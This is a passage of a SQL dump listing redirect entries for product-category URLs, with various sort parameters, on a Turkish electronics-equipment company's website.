00:00:00',301),(42342,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:15','0000-00-00 00:00:00',301),(42343,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-29 08:04:17','0000-00-00 00:00:00',301),(42344,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:04:18','0000-00-00 00:00:00',301),(42345,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:20','0000-00-00 00:00:00',301),(42346,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:22','0000-00-00 00:00:00',301),(42347,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:53:49','0000-00-00 00:00:00',301),(42348,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 08:53:51','0000-00-00 00:00:00',301),(42349,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 08:53:53','0000-00-00 00:00:00',301),(42350,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:53:55','0000-00-00 00:00:00',301),(42351,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:53:58','0000-00-00 00:00:00',301),(42352,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:00','0000-00-00 00:00:00',301),(42353,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 08:54:02','0000-00-00 00:00:00',301),(42354,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:04','0000-00-00 00:00:00',301),(42355,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:06','0000-00-00 00:00:00',301),(42356,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:08','0000-00-00 00:00:00',301),(42357,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:10','0000-00-00 00:00:00',301),(42358,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:13','0000-00-00 00:00:00',301),(42359,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:15','0000-00-00 00:00:00',301),(42360,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 08:54:17','0000-00-00 00:00:00',301),(42361,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 08:54:19','0000-00-00 00:00:00',301),(42362,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-29 08:54:21','0000-00-00 00:00:00',301),(42363,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:23','0000-00-00 00:00:00',301),(42364,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:25','0000-00-00 00:00:00',301),(42365,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:27','0000-00-00 00:00:00',301),(42366,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-29 08:54:29','0000-00-00 00:00:00',301),(42367,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:31','0000-00-00 00:00:00',301),(42368,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:34','0000-00-00 00:00:00',301),(42369,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:36','0000-00-00 00:00:00',301),(42370,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 08:54:38','0000-00-00 00:00:00',301),(42371,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:40','0000-00-00 00:00:00',301),(42372,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:42','0000-00-00 00:00:00',301),(42373,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:44','0000-00-00 00:00:00',301),(42374,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 08:54:46','0000-00-00 00:00:00',301),(42375,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:48','0000-00-00 00:00:00',301),(42376,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:51','0000-00-00 00:00:00',301),(42377,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:53','0000-00-00 00:00:00',301),(42378,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 08:54:55','0000-00-00 00:00:00',301),(42379,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:56','0000-00-00 00:00:00',301),(42380,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-29 08:54:58','0000-00-00 00:00:00',301),(42381,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n',NULL,'','',1,0,'2025-06-29 08:55:00','0000-00-00 00:00:00',301),(42382,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 08:55:02','0000-00-00 00:00:00',301),(42383,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 08:55:04','0000-00-00 00:00:00',301),(42384,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:55:06','0000-00-00 00:00:00',301),(42385,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-29 09:36:01','0000-00-00 00:00:00',301),(42386,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:03','0000-00-00 00:00:00',301),(42387,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:06','0000-00-00 00:00:00',301),(42388,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:08','0000-00-00 00:00:00',301),(42389,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:10','0000-00-00 00:00:00',301),(42390,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 09:36:13','0000-00-00 00:00:00',301),(42391,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 09:36:15','0000-00-00 00:00:00',301),(42392,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:17','0000-00-00 00:00:00',301),(42393,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:20','0000-00-00 00:00:00',301),(42394,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:22','0000-00-00 00:00:00',301),(42395,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 09:36:24','0000-00-00 00:00:00',301),(42396,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:28','0000-00-00 00:00:00',301),(42397,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:30','0000-00-00 00:00:00',301),(42398,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:32','0000-00-00 00:00:00',301),(42399,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 09:36:34','0000-00-00 00:00:00',301),(42400,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:36','0000-00-00 00:00:00',301),(42401,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:39','0000-00-00 00:00:00',301),(42402,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:41','0000-00-00 00:00:00',301),(42403,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 09:36:44','0000-00-00 00:00:00',301),(42404,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:46','0000-00-00 00:00:00',301),(42405,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 09:36:48','0000-00-00 00:00:00',301),(42406,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:50','0000-00-00 00:00:00',301),(42407,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:52','0000-00-00 00:00:00',301),(42408,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:36:54','0000-00-00 00:00:00',301),(42409,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 09:36:56','0000-00-00 00:00:00',301),(42410,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:36:58','0000-00-00 00:00:00',301),(42411,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:00','0000-00-00 00:00:00',301),(42412,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:02','0000-00-00 00:00:00',301),(42413,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 09:37:04','0000-00-00 00:00:00',301),(42414,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:06','0000-00-00 00:00:00',301),(42415,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:08','0000-00-00 00:00:00',301),(42416,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:10','0000-00-00 00:00:00',301),(42417,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:11','0000-00-00 00:00:00',301),(42418,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 09:37:13','0000-00-00 00:00:00',301),(42419,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 09:37:15','0000-00-00 00:00:00',301),(42420,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:17','0000-00-00 00:00:00',301),(42421,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:18','0000-00-00 00:00:00',301),(42422,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:20','0000-00-00 00:00:00',301),(42423,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-29 09:37:22','0000-00-00 00:00:00',301),(42424,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:24','0000-00-00 00:00:00',301),(42425,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:26','0000-00-00 00:00:00',301),(42426,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:28','0000-00-00 00:00:00',301),(42427,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-29 09:37:29','0000-00-00 00:00:00',301),(42428,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:31','0000-00-00 00:00:00',301),(42429,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:33','0000-00-00 00:00:00',301),(42430,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:35','0000-00-00 00:00:00',301),(42431,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',1,0,'2025-06-29 09:37:36','0000-00-00 00:00:00',301),(42432,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:38','0000-00-00 00:00:00',301),(42433,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 09:37:40','0000-00-00 00:00:00',301),(42434,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:42','0000-00-00 00:00:00',301),(42435,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:44','0000-00-00 00:00:00',301),(42436,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:46','0000-00-00 00:00:00',301),(42437,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 09:37:47','0000-00-00 00:00:00',301),(42438,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:49','0000-00-00 00:00:00',301),(42439,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:51','0000-00-00 00:00:00',301),(42440,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:53','0000-00-00 00:00:00',301),(42441,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku',NULL,'','',1,0,'2025-06-29 09:37:55','0000-00-00 00:00:00',301),(42442,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:37:57','0000-00-00 00:00:00',301),(42443,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 09:37:58','0000-00-00 00:00:00',301),(42444,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:00','0000-00-00 00:00:00',301),(42445,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:02','0000-00-00 00:00:00',301),(42446,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 09:38:04','0000-00-00 00:00:00',301),(42447,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 09:38:05','0000-00-00 00:00:00',301),(42448,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:07','0000-00-00 00:00:00',301),(42449,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:09','0000-00-00 00:00:00',301),(42450,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:11','0000-00-00 00:00:00',301),(42451,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 09:38:13','0000-00-00 00:00:00',301),(42452,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:14','0000-00-00 00:00:00',301),(42453,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:16','0000-00-00 00:00:00',301),(42454,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:18','0000-00-00 00:00:00',301),(42455,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 09:38:20','0000-00-00 00:00:00',301),(42456,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:22','0000-00-00 00:00:00',301),(42457,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:23','0000-00-00 00:00:00',301),(42458,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:25','0000-00-00 00:00:00',301),(42459,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 09:38:27','0000-00-00 00:00:00',301),(42460,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:29','0000-00-00 00:00:00',301),(42461,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 09:38:31','0000-00-00 00:00:00',301),(42462,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:33','0000-00-00 00:00:00',301),(42463,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:34','0000-00-00 00:00:00',301),(42464,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:36','0000-00-00 00:00:00',301),(42465,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 09:38:38','0000-00-00 00:00:00',301),(42466,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:40','0000-00-00 00:00:00',301),(42467,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:42','0000-00-00 00:00:00',301),(42468,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:44','0000-00-00 00:00:00',301),(42469,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 09:38:45','0000-00-00 00:00:00',301),(42470,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:47','0000-00-00 00:00:00',301),(42471,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:49','0000-00-00 00:00:00',301),(42472,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:51','0000-00-00 00:00:00',301),(42473,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 09:38:53','0000-00-00 00:00:00',301),(42474,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 09:38:54','0000-00-00 00:00:00',301),(42475,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 09:38:56','0000-00-00 00:00:00',301),(42476,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 09:38:58','0000-00-00 00:00:00',301),(42477,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:00','0000-00-00 00:00:00',301),(42478,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:02','0000-00-00 00:00:00',301),(42479,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-29 09:39:03','0000-00-00 00:00:00',301),(42480,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:05','0000-00-00 00:00:00',301),(42481,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:07','0000-00-00 00:00:00',301),(42482,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-29 09:39:09','0000-00-00 00:00:00',301),(42483,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:39:11','0000-00-00 00:00:00',301),(42484,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:13','0000-00-00 00:00:00',301),(42485,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:14','0000-00-00 00:00:00',301),(42486,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering',NULL,'','',1,0,'2025-06-29 09:39:16','0000-00-00 00:00:00',301),(42487,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:18','0000-00-00 00:00:00',301),(42488,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 09:39:20','0000-00-00 00:00:00',301),(42489,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:39:22','0000-00-00 00:00:00',301),(42490,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:23','0000-00-00 00:00:00',301),(42491,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:25','0000-00-00 00:00:00',301),(42492,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 09:39:27','0000-00-00 